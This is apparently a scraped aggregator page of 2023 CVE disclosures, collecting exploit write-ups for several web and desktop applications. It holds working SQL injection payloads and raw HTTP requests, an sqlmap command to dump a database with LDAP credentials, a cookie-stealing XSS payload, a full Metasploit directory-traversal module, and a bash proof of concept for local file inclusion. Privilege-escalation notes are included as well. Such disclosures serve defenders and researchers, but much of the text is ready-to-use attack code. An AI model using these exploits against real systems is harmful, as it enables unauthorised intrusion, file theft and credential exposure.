Judging Management System v1.0 was discovered to contain a SQL injection vulnerability via the event_id parameter at /php-jms/result_sheet.php.

**Judging Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: M1st

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/result\_sheet.php?event\_id=

Vulnerability location: /php-jms/result\_sheet.php?event\_id=, event\_id

dbname =jms\_db

\[+\] Payload: /php-jms/result\_sheet.php?event\_id=-1%27%20union%20select%201,2,3,database(),5,6,7,8,9,10,11--+ // Leak place ---> event\_id

GET /php\-jms/result\_sheet.php?event\_id\=\-1%27%20union%20select%201,2,3,database(),5,6,7,8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1
Connection: close

CVE-2023-30203: bug_report/SQLi-2.md at main · debug601/bug_report

Companymaps version 8.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: Unauthenticated SQL injection 
- Google Dork: 
- Date: 27.04.2023 
- Exploit Author: Lucas Noki (0xPrototype) 
- Vendor Homepage: https://github.com/vogtmh 
- Software Link: https://github.com/vogtmh/cmaps 
- Version: 8.0 
- Tested on: Mac, Windows, Linux 
- CVE : CVE-2023-29809

*Description:*

The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However if a single quote gets appended to the value of the `bookmap` parameter we get an error message: 
```html 
Warning: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in /var/www/html/rest/booking/index.php on line 152 
```

Now if two single quotes get appended we get the normal response without an error. This confirms the opportunity for sql injection. To really prove the SQL injection we append the following payload: 
``` 
'-(select*from(select+sleep(2)+from+dual)a)--+ 
```

The page will sleep for two seconds. This confirms the SQL injection.

*Steps to reproduce:*

1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+```

2. If the site slept for two seconds run the following sqlmap command to dump the whole database including the ldap credentials. 
 ```shell 
 python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump 
 ```

Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

## Request to the server:

<img src="Screenshot 2023-04-30 at 22.23.51.png" alt="Screenshot 2023-04-30 at 22.23.51" style="zoom:50%;" />

## Response from the server:

Look at the response time.

<img src="Screenshot 2023-04-30 at 22.24.35.png" alt="Screenshot 2023-04-30 at 22.24.35" style="zoom:50%;" />

Companymaps 8.0 SQL Injection

Companymaps version 8.0 suffers from a cross site scripting vulnerability.

# Exploit Title: Reflected Cross Site Scripting- Google Dork:- Date: 27.04.2023- Exploit Author: Lucas Noki (0xPrototype)- Vendor Homepage: https://github.com/vogtmh- Software Link: https://github.com/vogtmh/cmaps- Version: 8.0- Tested on: Mac, Windows, Linux- CVE : CVE-2023-29808*Description:*The vulnerability found is Reflected Cross Site Scripting. When the `/index.php?map=overview&findme=` endpoint is hit with a request where the "findme" parameter contains a malicious payload we have the possibility to perform an XSS attack. This happens because the input isn't sanitized.*Steps to reproduce:*1. Clone the repository and install the application2. Send a maliciously crafted payload via the "findme" parameter to the following endpoint: /index.php?map=overview&findme=3. The payload used is: ";alert(document.cookie)//4. Simply visiting the complete URL: http://IP/index.php?map=overview&findme=";alert(document.cookie)// is enough. Now an alertbox should pop up with your current cookie value. <img src="Screenshot 2023-05-03 at 17.56.59.png" alt="Screenshot 2023-05-03 at 17.56.59" style="zoom:50%;" />Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

Companymaps 8.0 Cross Site Scripting

GV-Edge Recording Manager version 2.2.3.0 suffers from a privilege escalation vulnerability.

    # Exploit Title: GV-Edge Recording Manager 2.2.3.0 - Privilege Escalation due Incorrect Default Permissions# Date: 2023-05-04# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://www.geovision.com.tw - https://gvision.it# Software Link: https://dlcdn.geovision.com.tw/Software/DVD/Paid/GV-EdgeRecordingManager.zip# Version: 2.2.3.0 / Installer version: 12.0.0.49974# Tested on: Windows 10 Pro 22H2 x64# CVE: CVE-2023-23059 / Vendor Advisory ID: GV-ERM-2023-05 / Article ID: GV4-23-05-03An issue was discovered in GeoVision GV-Edge Recording Manager 2.2.3.0 for Windows (Installer version: 12.0.0.49974),which contains improper permissions within the default installation and allows attackers to execute arbitrary code andgain escalated privileges.Vendor security advisory: Security_Advistory_ERM-2023-05.pdfTimeline:2023-01-02: Vulnerability discovered, vendor contacted2023-01-03: Vendor replies, request for CVE reservation, acknowledgments and coordinating for advisory,2023-01-04: Vendor assigned case S-202301030001, request for internal support and fix,2023-04-25: Assigned CVE number: CVE-2023-23059, notified Vendor for coordinated disclosure,2023-05-03: Vendor Security Advisory publication on https://www.geovision.com.tw/cyber_security.php2023-05-04: CVE publication / disclosure.

GV-Edge Recording Manager 2.2.3.0 Privilege Escalation

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Carlo Gavazzi Powersoft up to version 2.1.1.1 allows an unauthenticated, remote attacker to download any file from the affected device.

require 'msf/core'
 
 class MetasploitModule < Msf::Auxiliary
 	Rank = GreatRanking
 
 	include Msf::Exploit::Remote::HttpClient
 
 	def initialize(info = {})
 		super(update_info(info,
 			'Name' => 'Carlo Gavazzi Powersoft Directory Traversal',
 			'Description' => %q{
 				This module exploits a directory traversal vulnerability
 				found in Carlo Gavazzi Powersoft <= 2.1.1.1. The vulnerability
 				is triggered when sending a specially crafted GET request to the
 				server. The location parameter of the GET request is not sanitized
 				and the sendCommand.php script will automatically pull down any
 				file requested
 			},
 			'Author' => [ 'james fitts' ],
 			'License' => MSF_LICENSE,
 			'References' =>
 				[
 					[ 'URL', 'http://gleg.net/agora_scada_upd.shtml']
 				],
 			'DisclosureDate' => 'Jan 21 2015'))
 
 		register_options(
 			[
 				OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 8]),
 				OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
 				OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin']),
 				OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin']),
 				Opt::RPORT(80)
 			], self.class )
 	end
 
 	def run
 
 	require 'base64'
 
 	credentials = Base64.encode64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}")
 
 	depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
 	levels = "/" + ("../" * depth)
 
 	res = send_request_raw({
 		'method'	=> 'GET',
 		'uri'		=> "#{levels}#{datastore['FILE']}?res=&valid=true",
 		'headers'	=>	{
 			'Authorization'	=>	"Basic #{credentials}"
 		},
 	})
 
 	if res and res.code == 200
 		loot = res.body
 		if not loot or loot.empty?
 			print_status("File from #{rhost}:#{rport} is empty...")
 			return
 		end
 		file = ::File.basename(datastore['FILE'])
 		path = store_loot('carlo.gavazzi.powersoft.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
 		print_status("Stored #{datastore['FILE']} to #{path}")
 		return
 	end
 
 	end
 end

CVE-2017-20184: OffSec’s Exploit Database Archive

Judging Management System v1.0 by oretnom23 was discovered to vulnerable to SQL injection via /php-jms/review_result.php?mainevent_id=, mainevent_id.

**Judging Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/review\_result.php?mainevent\_id=

Vulnerability location: /php-jms/review\_result.php?mainevent\_id=, mainevent\_id

dbname =jms\_db

\[+\] Payload: /php-jms/review\_result.php?mainevent\_id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+// Leak place ---> mainevent\_id

​sql GET /php-jms/review_result.php?mainevent_id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1 Host: 192.168.1.88 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1 Connection: close ​

CVE-2023-30077: cve_report/SQLi-1.md at main · Dzero57/cve_report

An issue was discovered in Genomedics MilleGP5 5.9.2, allows remote attackers to execute arbitrary code and gain escalated privileges via modifying specific files.

    # Exploit Title: MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control# Date: 2023-04-28# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://millegpg.it/# Software Homepage: https://millegpg.it - https://millewin.it/prodotti/governo-clinico-3/# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe# Version: 5.9.2# Tested on: Microsoft Windows 10 Enterprise x64 22H2, build 19045.2913# CVE: CVE-2023-25438MilleGPG / MilleGPG5 also known as "Governo Clinico 3"Vendor: Millennium S.r.l. / Dedalus Group - Dedalus Italia S.p.a. / Genomedics S.r.l.Affected/tested version: MilleGPG5 5.9.2Summary:Mille General Practice Governance (MilleGPG): an interactive tool to address an effective quality of care through theItalian general practice network.MilleGPG is an innovative IT support for the evaluation and optimization of patient care and intervention processes,complete with new features for the management of the COVID-19 vaccine campaign. It is An irreplaceable "ally" for theGeneral Practitioner, also offering contextual access to the most authoritative scientific content and CME training.Vuln desc:The application is prone to insecure file/folder permissions on its default installation path, wrongly allowing somefiles to be modified by unprivileged users, malicious process and/or threat actor. Attacker can exploit the weaknessabusing the "write" permission of the main application available to all users on the system or network.Details:Any low privileged user can elevate their privileges abusing files/folders that have incorrect permissions, e.g.:C:\Program Files\MilleGPG5\MilleGPG5.exe    (main gui application)C:\Program Files\MilleGPG5\plugin\          (GPGCommand.exe, nginx and php files)C:\Program Files\MilleGPG5\k-platform\      (api and webapp files)such as BUILTIN\Users:(I)(OI)(CI)(R,W) and/or FILE_GENERIC_WRITE, FILE_WRITE_DATA and FILE_WRITE_EA

CVE-2023-25438: MilleGPG5 5.9.2 Local Privilege Escalation ≈ Packet Storm

Judging Management System v1.0 was discovered to contain a SQL injection vulnerability via the judge_id parameter at /php-jms/edit_judge.php.

Permalink

Cannot retrieve contributors at this time

**Judging Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: whoamikey

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/edit\_judge.php?sub\_event\_id=&se\_name=&judge\_id=

Vulnerability location: /php-jms/edit\_judge.php?sub\_event\_id=&se\_name=&judge\_id=, judge\_id

dbname =jms\_db

\[+\] Payload: /php-jms/edit\_judge.php?sub\_event\_id=&se\_name=&judge\_id=-1%27%20union%20select%201,2,database(),4,5,6--+ // Leak place ---> judge\_id

GET /php\-jms/edit\_judge.php?sub\_event\_id\=&se\_name\=&judge\_id\=\-1%27%20union%20select%201,2,database(),4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1
Connection: closes

CVE-2023-30204: bug_report/SQLi-3.md at main · debug601/bug_report

A stored cross-site scripting (XSS) vulnerability in DouPHP v1.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the unique_id parameter in /admin/article.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-30205: DouPHP-xss · Issue #2 · succc3/cve

SoftExpert Suite version 2.1.3 suffers from a local file inclusion vulnerability.

# Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion# Date: 27-04-2023# Exploit Author: Felipe Alcantara (Filiplain)# Vendor Homepage: https://www.softexpert.com/# Version: 2.0 < 2.1.3# Tested on: Kali Linux# CVE : CVE-2023-30330# SE Suite versions tested: 2.0.15.31, 2.0.15.115# https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330#!/bin/bash# Usage: ./lfi-poc.sh <domain> <username> <password> <File Path> target=$1u=$2p=$3file=$(echo -n "$4"|base64 -w 0)end="\033[0m\e[0m"red="\e[0;31m\033[1m"blue="\e[0;34m\033[1m"echo -e "\n$4 : $file\n"echo -e "${blue}\nGETTING SESSION COOKIE${end}"cookie=$(curl -i -s -k -X $'POST' \ -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \ -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \ --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \ "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2)echo "cookie: $cookie"function LFI () {curl -s -k -X $'POST' \ -H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \ -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \ --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \ "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"}echo -e "${blue}\nExploiting LFI:${end}"LFIfunction logout () {curl -i -s -k -X $'POST' \ -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \ -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \ "https://$target/softexpert/selogout"}echo -e "${blue}\nLogging out${end}"logout >/dev/nullecho -e "\n\nDone!"

Tag

#php